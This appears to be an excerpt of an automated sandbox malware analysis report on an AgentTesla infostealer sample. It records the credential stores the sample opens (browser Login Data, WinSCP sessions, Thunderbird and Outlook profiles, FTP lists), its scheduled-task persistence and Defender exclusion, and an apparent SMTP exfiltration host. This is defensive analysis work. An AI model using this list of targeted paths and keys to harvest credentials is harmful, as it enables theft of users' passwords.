                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeQueries volume information: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeQueries volume information: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                        Stealing of Sensitive Information

                        barindex
                        Yara detected AgentTesla
                        Source: Yara matchFile source: 10.2.NxmtwwVGOtEdjd.exe.45296a0.4.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.2.NxmtwwVGOtEdjd.exe.4500680.3.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.LisectAVT_2403002A_16.exe.41d8730.5.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.2.NxmtwwVGOtEdjd.exe.45296a0.4.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.2.NxmtwwVGOtEdjd.exe.4500680.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.LisectAVT_2403002A_16.exe.41d8730.5.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000009.00000002.2898350883.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000A.00000002.1787617220.0000000004500000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1723431532.00000000041AF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: dump.pcap, type: PCAP
                        Source: Yara matchFile source: 0000000F.00000002.2902484873.0000000002D3A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000009.00000002.2901886951.0000000002ECA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000009.00000002.2901886951.0000000002E71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000F.00000002.2902484873.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: LisectAVT_2403002A_16.exe PID: 7544, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: NxmtwwVGOtEdjd.exe PID: 7972, type: MEMORYSTR
                        Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                        Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                        Tries to harvest and steal browser information (history, passwords, etc)
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
                        Tries to harvest and steal ftp login credentials
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeFile opened: C:\FTP Navigator\Ftplist.txt
                        Tries to steal Mail credentials (via file / registry access)
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                        Source: Yara matchFile source: 00000009.00000002.2901886951.0000000002E71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000F.00000002.2902484873.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: LisectAVT_2403002A_16.exe PID: 7544, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: NxmtwwVGOtEdjd.exe PID: 7972, type: MEMORYSTR
                        Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

                        Remote Access Functionality

                        barindex
                        Yara detected AgentTesla
                        Source: Yara matchFile source: 10.2.NxmtwwVGOtEdjd.exe.45296a0.4.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.2.NxmtwwVGOtEdjd.exe.4500680.3.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.LisectAVT_2403002A_16.exe.41d8730.5.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.2.NxmtwwVGOtEdjd.exe.45296a0.4.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.2.NxmtwwVGOtEdjd.exe.4500680.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.LisectAVT_2403002A_16.exe.41d8730.5.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000009.00000002.2898350883.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000A.00000002.1787617220.0000000004500000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1723431532.00000000041AF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: dump.pcap, type: PCAP
                        Source: Yara matchFile source: 0000000F.00000002.2902484873.0000000002D3A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000009.00000002.2901886951.0000000002ECA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000009.00000002.2901886951.0000000002E71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000F.00000002.2902484873.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: LisectAVT_2403002A_16.exe PID: 7544, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: NxmtwwVGOtEdjd.exe PID: 7972, type: MEMORYSTR
                        Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

                        Mitre Att&ck Matrix

                        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                        Gather Victim Identity InformationAcquire InfrastructureValid Accounts121
                        Windows Management Instrumentation                        		1
                        Scheduled Task/Job                        		111
                        Process Injection                        		1
                        Masquerading                        		2
                        OS Credential Dumping                        		111
                        Security Software Discovery                        		Remote Services1
                        Email Collection                        		1
                        Encrypted Channel                        		Exfiltration Over Other Network MediumAbuse Accessibility Features
                        CredentialsDomainsDefault Accounts1
                        Scheduled Task/Job                        		1
                        DLL Side-Loading                        		1
                        Scheduled Task/Job                        		11
                        Disable or Modify Tools                        		1
                        Credentials in Registry                        		1
                        Process Discovery                        		Remote Desktop Protocol11
                        Archive Collected Data                        		1
                        Non-Standard Port                        		Exfiltration Over BluetoothNetwork Denial of Service
                        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                        DLL Side-Loading                        		141
                        Virtualization/Sandbox Evasion                        		Security Account Manager141
                        Virtualization/Sandbox Evasion                        		SMB/Windows Admin Shares2
                        Data from Local System                        		1
                        Non-Application Layer Protocol                        		Automated ExfiltrationData Encrypted for Impact
                        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook111
                        Process Injection                        		NTDS1
                        Application Window Discovery                        		Distributed Component Object ModelInput Capture11
                        Application Layer Protocol                        		Traffic DuplicationData Destruction
                        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                        Deobfuscate/Decode Files or Information                        		LSA Secrets1
                        File and Directory Discovery                        		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
                        Obfuscated Files or Information                        		Cached Domain Credentials24
                        System Information Discovery                        		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                        Software Packing                        		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                        Timestomp                        		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                        Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                        DLL Side-Loading                        		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                        Behavior Graph

                        Hide Legend

                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet
                        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1482478 Sample: LisectAVT_2403002A_16.exe Startdate: 25/07/2024 Architecture: WINDOWS Score: 100 48 mail.mbarieservicesltd.com 2->48 50 171.39.242.20.in-addr.arpa 2->50 54 Found malware configuration 2->54 56 Antivirus / Scanner detection for submitted sample 2->56 58 Sigma detected: Scheduled temp file as task from temp location 2->58 60 7 other signatures 2->60 8 LisectAVT_2403002A_16.exe 7 2->8         started        12 NxmtwwVGOtEdjd.exe 5 2->12         started        signatures3 process4 file5 40 C:\Users\user\AppData\...40xmtwwVGOtEdjd.exe, PE32 8->40 dropped 42 C:\...42xmtwwVGOtEdjd.exe:Zone.Identifier, ASCII 8->42 dropped 44 C:\Users\user\AppData\Local\...\tmpB5CB.tmp, XML 8->44 dropped 46 C:\Users\...\LisectAVT_2403002A_16.exe.log, ASCII 8->46 dropped 62 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 8->62 64 Uses schtasks.exe or at.exe to add and modify task schedules 8->64 66 Adds a directory exclusion to Windows Defender 8->66 14 LisectAVT_2403002A_16.exe 2 8->14         started        18 powershell.exe 22 8->18         started        20 powershell.exe 23 8->20         started        28 2 other processes 8->28 68 Antivirus detection for dropped file 12->68 70 Machine Learning detection for dropped file 12->70 72 Injects a PE file into a foreign processes 12->72 22 NxmtwwVGOtEdjd.exe 12->22         started        24 schtasks.exe 12->24         started        26 NxmtwwVGOtEdjd.exe 12->26         started        signatures6 process7 dnsIp8 52 mail.mbarieservicesltd.com 199.79.62.115, 49735, 49736, 587 PUBLIC-DOMAIN-REGISTRYUS United States 14->52 74 Loading BitLocker PowerShell Module 18->74 30 conhost.exe 18->30         started        32 WmiPrvSE.exe 18->32         started        34 conhost.exe 20->34         started        76 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 22->76 78 Tries to steal Mail credentials (via file / registry access) 22->78 80 Tries to harvest and steal ftp login credentials 22->80 82 Tries to harvest and steal browser information (history, passwords, etc) 22->82 36 conhost.exe 24->36         started        38 conhost.exe 28->38         started        signatures9 process10

                        Screenshots

                        Thumbnails

                        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                        windows-stand

                        Antivirus, Machine Learning and Genetic Malware Detection

                        Initial Sample

                        SourceDetectionScannerLabelLink
                        LisectAVT_2403002A_16.exe100%AviraTR/Kryptik.mzsma
                        LisectAVT_2403002A_16.exe100%Joe Sandbox ML

                        Dropped Files

                        SourceDetectionScannerLabelLink
                        C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe100%AviraTR/Kryptik.mzsma
                        C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe100%Joe Sandbox ML

                        Unpacked PE Files

                        No Antivirus matches

                        Domains

                        No Antivirus matches

                        URLs

                        SourceDetectionScannerLabelLink
                        http://www.apache.org/licenses/LICENSE-2.00%URL Reputationsafe
                        http://www.fontbureau.com0%URL Reputationsafe
                        http://www.fontbureau.com/designersG0%URL Reputationsafe
                        http://www.fontbureau.com/designers/?0%URL Reputationsafe
                        http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                        http://www.fontbureau.com/designers?0%URL Reputationsafe
                        http://www.tiro.com0%URL Reputationsafe
                        http://www.fontbureau.com/designers0%URL Reputationsafe
                        http://www.goodfont.co.kr0%URL Reputationsafe
                        http://www.carterandcone.coml0%URL Reputationsafe
                        http://www.sajatypeworks.com0%URL Reputationsafe
                        http://www.typography.netD0%URL Reputationsafe
                        http://www.fontbureau.com/designers/cabarga.htmlN0%URL Reputationsafe
                        http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
                        http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                        http://www.founder.com.cn/cn0%URL Reputationsafe
                        http://www.fontbureau.com/designers/frere-user.html0%URL Reputationsafe
                        http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
                        http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                        http://www.fontbureau.com/designers80%URL Reputationsafe
                        http://www.fonts.com0%URL Reputationsafe
                        http://www.sandoll.co.kr0%URL Reputationsafe
                        http://www.urwpp.deDPlease0%URL Reputationsafe
                        http://www.zhongyicts.com.cn0%URL Reputationsafe
                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                        http://www.sakkal.com0%URL Reputationsafe
                        http://mail.mbarieservicesltd.com0%Avira URL Cloudsafe

                        Domains and IPs

                        Contacted Domains

                        NameIPActiveMaliciousAntivirus DetectionReputation
                        mail.mbarieservicesltd.com
                        		199.79.62.115
                        		truetrue
                          		unknown
                          171.39.242.20.in-addr.arpa
                          		unknown
                          		unknownfalse
                            		unknown

                            URLs from Memory and Binaries

                            NameSourceMaliciousAntivirus DetectionReputation
                            http://www.apache.org/licenses/LICENSE-2.0LisectAVT_2403002A_16.exe, 00000000.00000002.1726982269.0000000007062000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.fontbureau.comLisectAVT_2403002A_16.exe, 00000000.00000002.1726982269.0000000007062000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.fontbureau.com/designersGLisectAVT_2403002A_16.exe, 00000000.00000002.1726982269.0000000007062000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.fontbureau.com/designers/?LisectAVT_2403002A_16.exe, 00000000.00000002.1726982269.0000000007062000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.founder.com.cn/cn/bTheLisectAVT_2403002A_16.exe, 00000000.00000002.1726982269.0000000007062000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.fontbureau.com/designers?LisectAVT_2403002A_16.exe, 00000000.00000002.1726982269.0000000007062000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.tiro.comLisectAVT_2403002A_16.exe, 00000000.00000002.1726982269.0000000007062000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.fontbureau.com/designersLisectAVT_2403002A_16.exe, 00000000.00000002.1726982269.0000000007062000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.goodfont.co.krLisectAVT_2403002A_16.exe, 00000000.00000002.1726982269.0000000007062000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.carterandcone.comlLisectAVT_2403002A_16.exe, 00000000.00000002.1726982269.0000000007062000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.sajatypeworks.comLisectAVT_2403002A_16.exe, 00000000.00000002.1726982269.0000000007062000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.typography.netDLisectAVT_2403002A_16.exe, 00000000.00000002.1726982269.0000000007062000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.fontbureau.com/designers/cabarga.htmlNLisectAVT_2403002A_16.exe, 00000000.00000002.1726982269.0000000007062000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.founder.com.cn/cn/cTheLisectAVT_2403002A_16.exe, 00000000.00000002.1726982269.0000000007062000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.galapagosdesign.com/staff/dennis.htmLisectAVT_2403002A_16.exe, 00000000.00000002.1726982269.0000000007062000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.founder.com.cn/cnLisectAVT_2403002A_16.exe, 00000000.00000002.1726982269.0000000007062000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.fontbureau.com/designers/frere-user.htmlLisectAVT_2403002A_16.exe, 00000000.00000002.1726982269.0000000007062000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.jiyu-kobo.co.jp/LisectAVT_2403002A_16.exe, 00000000.00000002.1726982269.0000000007062000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.galapagosdesign.com/DPleaseLisectAVT_2403002A_16.exe, 00000000.00000002.1726982269.0000000007062000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.fontbureau.com/designers8LisectAVT_2403002A_16.exe, 00000000.00000002.1726982269.0000000007062000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.fonts.comLisectAVT_2403002A_16.exe, 00000000.00000002.1726982269.0000000007062000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.sandoll.co.krLisectAVT_2403002A_16.exe, 00000000.00000002.1726982269.0000000007062000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.urwpp.deDPleaseLisectAVT_2403002A_16.exe, 00000000.00000002.1726982269.0000000007062000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.zhongyicts.com.cnLisectAVT_2403002A_16.exe, 00000000.00000002.1726982269.0000000007062000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameLisectAVT_2403002A_16.exe, 00000000.00000002.1722615685.0000000002EF3000.00000004.00000800.00020000.00000000.sdmp, NxmtwwVGOtEdjd.exe, 0000000A.00000002.1786665418.000000000323E000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.sakkal.comLisectAVT_2403002A_16.exe, 00000000.00000002.1726399605.0000000005990000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002A_16.exe, 00000000.00000002.1726982269.0000000007062000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://mail.mbarieservicesltd.comLisectAVT_2403002A_16.exe, 00000009.00000002.2901886951.0000000002ECA000.00000004.00000800.00020000.00000000.sdmp, NxmtwwVGOtEdjd.exe, 0000000F.00000002.2902484873.0000000002D3A000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown

                            World Map of Contacted IPs

                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs

                            Public IPs

                            IPDomainCountryFlagASNASN NameMalicious
                            199.79.62.115
                            		mail.mbarieservicesltd.comUnited States
                            		394695PUBLIC-DOMAIN-REGISTRYUStrue

                            General Information

                            Joe Sandbox version:40.0.0 Tourmaline
                            Analysis ID:1482478
                            Start date and time:2024-07-25 23:34:26 +02:00
                            Joe Sandbox product:CloudBasic
                            Overall analysis duration:0h 7m 51s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                            Number of analysed new started processes analysed:20
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Sample name:LisectAVT_2403002A_16.exe
                            Detection:MAL
                            Classification:mal100.troj.spyw.evad.winEXE@23/15@2/1
                            EGA Information:
                            • Successful, ratio: 100%
                            HCA Information:
                            • Successful, ratio: 100%
                            • Number of executed functions: 122
                            • Number of non-executed functions: 22
                            Cookbook Comments:
                            • Found application associated with file extension: .exe

                            Warnings

                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                            • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                            • Not all processes where analyzed, report is missing behavior information
                            • Report size exceeded maximum capacity and may have missing behavior information.
                            • Report size getting too big, too many NtCreateKey calls found.
                            • Report size getting too big, too many NtOpenKeyEx calls found.
